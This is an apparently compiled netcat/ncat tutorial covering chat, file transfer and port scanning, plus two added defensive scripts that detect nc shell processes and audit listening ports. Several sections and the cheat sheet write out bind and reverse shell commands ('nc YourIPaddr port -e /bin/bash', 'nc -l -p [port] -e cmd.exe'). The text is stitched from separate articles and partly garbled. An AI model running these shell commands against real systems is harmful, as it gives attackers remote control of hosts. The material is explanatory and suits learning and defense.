The nc command is often used for the following tasks: simple TCP proxies; shell-script based HTTP clients and servers; network daemon testing; a SOCKS or HTTP ProxyCommand for ssh(1). The nc command can also be run as netcat, using the identical options. The following options are supported: -4 forces nc to use IPv4 addresses only.
- C: nc -l -p LocalPort -e cmd.exe Create a shell on local port LocalPort that can then be accessed using a fundamental Netcat client Reverse backdoor shell on Linux: $ nc YourIPaddr port -e /bin/bash nc YourIPaddr port -e cmd.exe YourIPaddr on local port port. This shell can then be captured using a fundamental nc.
- Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to.
Netcat
Netcat is a terminal application that is similar to the telnet program but has a lot more features.
It's a 'power version' of the traditional telnet program.
Apart from basic telnet functions, it can do various other things, like creating socket servers to listen for incoming connections on ports and transferring files from the terminal.
So it is a small tool that is packed with lots of features, which is why it's called the 'Swiss-army knife for TCP/IP'.
The netcat manual defines netcat as
So basically netcat is a tool to do some bidirectional network communication over the TCP/UDP protocols.
More technically speaking, netcat can act as a socket server or client and interact with other programs at the same time sending and receiving data through the network.
Such a definition sounds too generic and makes it difficult to understand what exactly this tool does and what it is useful for. This can be understood only by using and playing with it.
Ncat
So the first thing to do is to set up netcat on your machine. Netcat comes in various flavors, meaning it is available from multiple vendors.
But most of them have similar functionality. On Ubuntu there are 3 packages called netcat-openbsd, netcat-traditional and ncat.
My preferred version is ncat. Ncat has been developed by the nmap team, is the best of all netcats available and, most importantly, it's cross-platform and works very well on Windows.
Project website:
http://nmap.org/ncat/
Install Ncat on Windows
Windows version of netcat can be downloaded from
http://joncraton.org/blog/46/netcat-for-windows
Simply download and extract the files somewhere suitable.
Or download ncat windows version
http://nmap.org/ncat/
Install Ncat on Ubuntu / Linux Mint / Linux
The Ubuntu Synaptic package manager has netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.
Install on Ubuntu
To use netcat-openbsd implementation use 'nc' command.
To use netcat-traditional implementation use 'nc.traditional' command
To use nmap ncat use the 'ncat' command.
Netcat Command Examples
In the following tutorial we are going to use all of them in different examples in different ways.
1. Telnet
The very first thing netcat can be used as is a telnet program. Let's see how.
Now netcat is connected to google.com on port 80 and it's time to send some message. Let's try to fetch the index page. For this type 'GET index.html HTTP/1.1' and hit the Enter key twice. Remember, twice.
The output from google.com has been received and echoed on the terminal.
2. Simple socket server
To open a simple socket server type in the following command.
The above command means: netcat, listen on TCP port 1234. The -v option gives verbose output for better understanding. Now from another terminal try to connect to port 1234 using the telnet command as follows:
After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.
This is a complete Chatting System. Type something in netcat terminal and it will show up in telnet terminal as well. So this technique can be used for chatting between 2 machines.
Complete ECHO Server
Ncat with the -c option can be used to start an echo server.
Start the echo server using ncat as follows
Now from another terminal connect using telnet and type something. It will be sent back with '[echo]' prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.
Note: Netcat can be told to save the data to a file instead of echoing it to the terminal.
3. Create UDP Server
Netcat works with UDP ports as well. To start a netcat server using UDP ports, use the -u option.
4. UDP Client
Connect to this server using netcat from another terminal
Now both terminals can chat with each other.
5. File transfer
A whole file can be transferred with netcat. Here is a quick example.
On machine A - Send File
In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal; instead it is piped or fed to ncat, which has opened a socket server on port 5555.
On machine B - Receive File
In the above command ncat will connect to localhost on port 5555 and whatever it receives will be written to happy_copy.txt
Now happy_copy.txt will be a copy of happy.txt since the data being sent over port 5555 is the content of happy.txt in the previous command.
Netcat will send the file only to the first client that connects to it. After that it's over.
And after the first client closes down the connection, the netcat server will also close down the connection.
6. Port scanning
Netcat can also be used for port scanning. However this is not a proper use of netcat and a more applicable tool like nmap should be used.
The '-n' parameter here prevents DNS lookup, '-z' makes nc not receive any data from the server, and '-w 1' makes the connection timeout after 1 second of inactivity.
7. Remote Shell/Backdoor
Ncat can be used to start a basic shell on a remote system on a port without the need of ssh. Here is a quick example.
The above will start a server on port 7777 and will pass all incoming input to the bash command, and the results will be sent back. The command basically converts the bash program into a server. So netcat can be used to convert any process into a server.
Connect to this bash shell using nc from another terminal
Now try executing any command like help , ls , pwd etc.
Windows
On windows machine the cmd.exe (dos prompt program) is used to start a similar shell using netcat. The syntax of the command is same.
Now another console can connect using the telnet command
Although netcat can be used to set up remote shells, it is not useful for getting an interactive shell on a remote system, because in most cases netcat would not be installed on the remote system.
The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.
8. Reverse Shells
This is the most powerful feature of netcat for which it is most used by hackers. Netcat is used in almost all reverse shell techniques to catch the reverse connection of shell program from a hacked system.
![Windows Windows](https://www.digitalmunition.me/wp-content/uploads/2019/07/1563002302_813_Netcat-vs-Cryptcat-Remote-Shell-to-Kali-Linux-from-Windows-machine.png)
Reverse telnet
First let's take an example of a simple reverse telnet connection. In an ordinary telnet connection the client connects to the server to start a communication channel.
Now using the above technique you can connect to, say, port 80 of the server to fetch a webpage. However a hacker is interested in getting a command shell. It's the command prompt of Windows or the terminal of Linux. The command shell gives ultimate control of the remote system. Now there is no service running on the remote server to which you can connect and get a command shell.
So when a hacker hacks into a system, he needs to get a command shell. Since it's not possible directly, the solution is to use a reverse shell. In a reverse shell the server initiates a connection to the hacker's machine and gives a command shell.
To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on local machine or the hacker's machine.
machine A
The above will start a socket server (listener) on port 8888 on local machine/hacker's machine.
Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.
For any method to work, the hacker either needs to be able to execute arbitrary command on the system or should be able to upload a file that can be executed by opening from the browser (like a php script).
In this example we are not doing either of the above mentioned things. We shall just run netcat on the server also to throw a reverse command shell to demonstrate the concept. So netcat should be installed on the server or target machine.
Machine B :
This command will connect to machine A on port 8888 and feed in the output of bash effectively giving a shell to machine A. Now machine A can execute any command on machine B.
Machine A
In a real hacking/penetration testing scenario it's not possible to run netcat on the target machine. Therefore other techniques are employed to create a shell. These include uploading reverse shell PHP scripts and running them by opening them in a browser, or launching a buffer overflow exploit to execute a reverse shell payload.
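Seen from the defending side, the shells in sections 7 and 8 are netcat processes started with -e or -c, and a process listing exposes them. The following is an added example, not part of the original tutorial, that flags such processes in ps output; the function names are hypothetical and the sample lines (PIDs, addresses, port 5000) are constructed.

```shell
#!/bin/sh
# Added example: flag netcat processes that attach a program to the socket,
# i.e. the -e / -c usage shown in the sections above.
# Assumed input: one process per line, "PID COMMAND ARGS...", as printed by
# `ps -eo pid=,args=` on Linux. A hit is a lead for triage, not a verdict.

flag_nc_exec() {
    awk '
    {
        # Basename of the executable, lower-cased, without a .exe suffix.
        n = split($2, path, "/")
        prog = tolower(path[n])
        sub(/\.exe$/, "", prog)
        if (prog !~ /^(nc|ncat|netcat|nc\.traditional|nc\.openbsd)$/) next

        listen = 0; target = ""
        for (i = 3; i <= NF; i++) {
            if ($i == "--listen") listen = 1
            else if ($i == "--exec" || $i == "--sh-exec") target = $(i + 1)
            else if ($i ~ /^-[A-Za-z]+$/) {
                # Short options may be clustered, e.g. -nvlp or -lve.
                if ($i ~ /l/) listen = 1
                if ($i ~ /[ec]$/) target = $(i + 1)
            }
        }
        if (target == "") next
        # Listener plus program = bind shell; outbound plus program = reverse shell.
        kind = listen ? "bind-shell" : "reverse-shell"
        printf "%s\t%s\t%s\n", $1, kind, target
    }'
}

# Constructed sample input for the example.
sample_ps() {
    cat <<'EOF'
  812 /usr/sbin/sshd -D
 1501 nc -l -v 1234
 2210 ncat -l -p 7777 -e /bin/bash
 2305 /bin/nc.traditional 192.0.2.10 8888 -e /bin/bash
 2412 ncat -v -l -p 5000 -c xargs -n1 echo [echo]
 3000 grep -e nc /var/log/syslog
EOF
}

# On a live Linux host: ps -eo pid=,args= | flag_nc_exec
sample_ps | flag_nc_exec
```

The plain listener (PID 1501) and the grep process are not reported; only the three processes that hand the socket to a program are.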
Conclusion
So in the above examples we saw how to use netcat for different network activities like telnet, reverse shells etc. Hackers mostly use it for creating quick reverse shells.
In this tutorial we covered some of the basic and common uses of netcat. Check out the wikipedia article for more information on what else netcat can do.
The Netcat utility program supports a wide range of commands to manage networks and monitor the flow of traffic data between systems. Computer networks, including the world wide web, are built on the backbone of the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). Think of it as a free and easy companion tool to use alongside Wireshark, which specializes in the analysis of network packets. The original version of Netcat was released back in 1995 and has received a number of iterative updates in the decades since.
What is Netcat Used For?
Netcat can be a useful tool for any IT team, though the growth of internally managed network services and cloud computing make that particular environment a natural fit. Network and system administrators need to be able to quickly identify how their network is performing and what type of activity is occurring.
Netcat functions as a back-end tool that allows for port scanning and port listening. In addition, you can actually transfer files directly through Netcat or use it as a backdoor into other networked systems. Partnered with a tool like Varonis Edge, you would receive an alert of any unusual activity and could then use Netcat to investigate. Lastly, Netcat is a flexible tool because of how it can be scripted for larger tasks.
Basic Netcat Commands
Once you have a Netcat application set up on your Windows or Linux server, you can start running basic commands to test its functionality. Here are a few to get started with:
nc -help – This command will print a list of all of the available commands you can use in Netcat. It will come in handy if you run into any errors while writing a script or are unsure of how to proceed.
nc -z -v site.com – This will run a basic port scan of the specified website or server. Netcat will return verbose results with lists of ports and statuses. Keep in mind that you can use an IP address in place of the site domain.
nc -l – This command will instruct the local system to begin listening for TCP connections and UDP activity on a specific port number.
nc site.com 1234 < file_name – This command will initiate the transfer of a file based on the specified port number.
Printf – Netcat can actually operate as a simplified web host. This command will let you save HTML code and publish it through your local server.
Netcat Command Syntax
All Netcat commands must start with the “netcat” identifier or “nc” as a shorter option. By default, the Netcat tool will assume you want to perform a port scan unless you indicate otherwise.
Different option parameters can be used that include: “-u” for UDP traffic instead of TCP, “-v” for verbose output, “-p” to specify a specific port, and “-D” to turn on full debugging mode. Individual attributes within a Netcat command must be separated with a space. The command prompt will inform you if you have a typo or unrecognized term in your script.
Port Scanning with Netcat Commands
When trying to diagnose a network issue or performance problem, executing a port scan with Netcat is a smart first step to take. The scan will check the status of all ports on the given domain or IP address so that you can determine whether a firewall or other blocking mechanism is in place.
A basic port scan command for an IP address looks like this:
nc -v -n 8.8.8.8 1-1000
Note that the numbers at the end of the command tell Netcat to only scan for ports between numbers 1 and 1000.
If you don’t know the IP address of a server or website, then you can look it up via a ping terminal command or just insert the domain into the Netcat command:
nc -v google.com 1-1000
You should always perform port scans when connected to your local enterprise network. If not, you can configure your router with a VPN service to create a secure tunnel into the network.
Create a Chat or Web Server
Chat programs are on the rise. From open-source solutions to those that seemed to suddenly gain massive popularity, there are a wide range of chat and communication tools available to enterprise organizations. The reality is that some IT experts and system administrators would prefer a simple text-only solution. Windows Netcat can actually fill that need and allow for the transmission of messages across a local network.
To get started, you first need Netcat to start listening on a port number. Make sure not to choose a port that is already in use by another application or service.
nc -l -p 1299
Then all you need to do is launch the chat session with a new TCP connection:
nc localhost 1299
This process can also be used to spin up a basic web server from your local machine. Netcat will function as the web host and allow you to store HTML content which can then be viewed through a web browser.
First, create a new text document on your local system and make sure to use valid HTML tags. Then save the file as “index.html” and store it in the root of your Netcat directory. Now switch back to the Netcat tool and run this command:
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8999
To see the HTML in action, simply open any web browser and navigate to your local IP address with :8999 at the end to specify the port of the host.
Verbose Scan with Netcat Commands
Every command you run in Netcat will include certain output text to indicate whether it was successful or not. For troubleshooting and debugging purposes, you’ll want to gather as much information and logs as possible while also investing in solutions like Varonis Datalert to detect threats and respond quickly. Netcat can help thanks to the verbose parameter which can be added to any basic Netcat command. Simply include “-v” to your command and run it again.
Even with this setting turned on, Netcat will not reveal any of your credentials or authentication data.
HTTP Requests with Netcat Commands
We’ve covered how you can use Netcat to host HTML pages on your local system. But the utility program can also be used to make web requests to outside servers. In this way, Netcat will essentially function as a web browser by obtaining raw HTML code.
Along with a tool like Varonis Edge, Netcat can be helpful for IT professionals who are looking into internet traffic issues or proxies. Here’s an example of how to obtain the HTML content from Google’s homepage:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
Note that the port number 80 is required for this type of command since the world wide web uses it as a default for TCP over IP connections.
TCP Server and TCP Client Commands
Although the TCP protocol is primarily used for transferring web traffic around the world, it can actually be implemented at a local level for file transfers. To accomplish this, you need to run Netcat from two locations: one that will act as a server to send the file and one that will act as the client to receive it.
Run this Netcat command on the server instance to send the file over port 1499:
nc -l 1499 < filename.in
Then run this command on the client to accept, receive, and close the connection:
nc server.com 1499 > filename.out
Make sure to replace “server.com” with the full hostname or IP address of the sending server.
ITEM with Netcat Commands
Newer versions of Netcat allow you to use ITEM format for transferring data instead of the standard TCP or UDP protocols. To accomplish this, you must follow this syntax:
file_path | device_path | network host
Prevent DNS Lookup with Netcat Commands
Netcat commands run fastest when they are operating purely on IP addresses. This is because no time is wasted talking to domain name servers (DNS) to translate server names into IP addresses. If you find that your Netcat commands are still running slow, make sure to add the “-n” operator so that the utility knows that DNS lookups are not required.
Shell Scripting with Netcat
As mentioned earlier, one of the benefits of using Netcat is that it can be included as part of a larger script that performs an automated function. As part of your security procedures, you might want to run a full port scan on all of your servers to detect new malicious applications that are listening for a connection.
You could write a script that:
1. Imports a text file of server names or IP addresses
2. Calls Netcat to run a port scan on each server
3. Writes the output to a new text file for analysis
Multiple Netcat commands can be grouped together in a single script and be run through either a Linux or Windows shell. In some cases, it may be worthwhile to run the scripts on a regular timetable.
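The three steps above as a small audit script, added here as an example and not taken from the original article: it probes each host in a list with nc -z and reports listeners that are missing from a saved baseline. The file names, the PORTS list and the host:port baseline format are assumptions.

```shell
#!/bin/sh
# Added example: find listeners that are not in a known-good baseline.
# Assumptions: the hosts file has one name or IP per line; the baseline has
# one "host:port" per line; nc supports -z and -w (netcat-openbsd, ncat).

# Ports to probe; the defaults include the listener ports used on this page.
PORTS="${PORTS:-22 80 443 1234 5555 7777 8888}"

# probe HOST PORT: succeed if a TCP connection can be opened.
probe() {
    nc -z -w 1 "$1" "$2" >/dev/null 2>&1
}

# scan_hosts HOSTFILE: print "host:port" for every open port found.
scan_hosts() {
    while IFS= read -r host || [ -n "$host" ]; do
        case "$host" in ''|'#'*) continue ;; esac   # skip blanks and comments
        for port in $PORTS; do
            # </dev/null keeps nc from swallowing the rest of the host list
            if probe "$host" "$port" </dev/null; then
                printf '%s:%s\n' "$host" "$port"
            fi
        done
    done < "$1"
}

# new_listeners BASELINE CURRENT: print entries present only in CURRENT.
new_listeners() {
    base_sorted=$(mktemp) || return 1
    sort -u "$1" > "$base_sorted"
    sort -u "$2" | comm -13 "$base_sorted" -
    rm -f "$base_sorted"
}

# Usage: sh audit.sh hosts.txt baseline.txt
if [ "$#" -eq 2 ]; then
    current=$(mktemp) || exit 1
    scan_hosts "$1" > "$current"
    new_listeners "$2" "$current" | tee "new-listeners-$(date +%Y%m%d).txt"
    rm -f "$current"
fi
```

An empty report means every open port was already in the baseline; any line in it is a listener to investigate before the baseline is updated.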
Launching Reverse (Backdoor) Shells
A reverse shell is a remote access approach where you run administrative commands from one terminal while connecting to another server on the network. To get started, you need to enable the shell tool over a Netcat command by using Netcat reverse shell:
nc -n -v -l -p 5555 -e /bin/bash
Then from any other system on the network, you can test how to run commands on the selected host after successful Netcat connection in bash:
nc -nv 127.0.0.1 5555
Netcat Cheat Sheet
Until you start using Netcat on a regular basis, you might get confused about the command syntax or forget what some of the parameters do. Don’t worry! We’ve included a cheat sheet below to help you find what you need quickly to run a working Netcat command.
![Command Command](https://i.stack.imgur.com/wM2v4.png)
Netcat Fundamentals
nc [options] [host] [port] – by default this will execute a port scan
nc -l [host] [port] – initiates a listener on the given port
Netcat Command Flags
nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output
Netcat Relays on Windows
nc [host] [port] > relay.bat – open a relay connection
nc -l -p [port] -e relay.bat – connect to relay
Netcat Relays on Linux
nc -l -p [port] 0< backpipe | nc [client IP] [port] | tee backpipe
Netcat File Transfer
nc [host] [port] < file_name.in – send a file
nc [host] [port] > file_name.out – receive a file
Netcat Port Scanner
nc -zv site.com 80 – scan a single port
nc -zv hostname.com 80 84 – scan a set of individual ports
nc -zv site.com 80-84 – scan a range of ports
Netcat Banners
echo "" | nc -zv -w1 [host] [port range] – obtain the TCP banners for a range of ports
Netcat Backdoor Shells
nc -l -p [port] -e /bin/bash – run a shell on Linux
nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows
Additional Netcat Resources
In today’s fast-changing world of technology and increasingly complex networks, companies need to be proactive when it comes to cybersecurity. That means hiring experts who know what threats to look for and how to combat them. Otherwise, a single instance of a cyberattack like ransomware could lead to lasting damage for the entire organization. Pairing solutions from Varonis with tools like Netcat will help to keep your internal network safer.